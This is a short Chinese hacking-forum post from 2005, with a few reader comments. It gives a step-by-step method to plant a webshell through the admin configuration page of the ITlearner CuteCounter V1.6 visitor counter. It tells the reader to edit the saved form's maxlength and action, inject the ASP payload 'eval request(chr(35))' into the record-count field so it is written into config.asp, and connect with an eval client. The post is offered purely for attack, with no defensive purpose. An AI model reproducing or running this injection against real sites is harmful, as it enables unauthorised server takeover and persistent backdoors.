2005-12-22 19:46:36 by: h4x0r
IT学习者统计程序 V1.6后台拿Webshell
ITlearner CuteCounter V1.6后台拿webshell一招
进入 http://url/admin.asp?action=ShowConfig,查看原代码查找
然后查找
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35))//此处没有哪个"的然后保存设置后提示成功后用海洋eval连接http://url/config.asp文件就获得一个webshell!
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=403
进入 http://url/admin.asp?action=ShowConfig,查看原代码查找
<td><inputname="RecordNum" type="text" id="RecordNum" value="100" size="40" maxlength="3"></td>
修改maxlength="3"为maxlength="50">然后查找
<form name="form1" method="post" action="?Action=SaveConfig">
处修改为action="http://url/admin?Action=SaveConfig">存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35))//此处没有哪个"的然后保存设置后提示成功后用海洋eval连接http://url/config.asp文件就获得一个webshell!
[Last Modified By h4x0r, at 2005-12-22 19:52:35]
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=403
就是最大长度吧!
真能找漏洞!
不能进后台怎么拿webshell!